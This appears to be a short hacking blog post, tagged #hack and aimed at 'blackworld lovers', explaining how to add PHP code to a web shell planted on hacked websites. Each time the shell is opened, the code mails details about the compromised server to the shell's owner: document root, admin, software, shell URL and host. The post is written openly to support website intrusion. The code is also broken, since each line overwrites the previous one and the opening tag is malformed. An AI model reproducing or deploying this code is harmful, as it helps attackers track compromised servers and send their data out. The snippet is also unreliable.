How to Log Your Php Shell ?

in #hack7 years ago

Hello blackworld lovers,

Today I will explain how to log your php Shell. What is it meaning ? It means that, for example you have got a php shell for hacking website and you wanna see who is using your Shell code in which websites, so you will need this code in your php shell.

This code will send the shelled website to the address which you define. Lets start with using with code;

< ? php
$who="[email protected]";
$title="Bingo -The new shelled website";
$ast="File Path : ".$_SERVER[’********_ROOT’]."\r\n";
$ast="Server Admin : ".$_SERVER[’SERVER_ADMIN’]."\r\n";
$ast="Server operating system: ".$_SERVER[’SERVER_SOFTWARE’]."\r\n";
$ast="Shell Link : http://".$_SERVER[’SERVER_NAME’].$_SERVER[’PHP_SELF’]."\r\n";
$ast="Shelled WebSite : " .$_SERVER[’HTTP_HOST’]."\r\n";
mail($who, $title, $ast);

You should change this code with your email; $who="[email protected]";

I hope this is useful article for you, guys.
Have a good day.
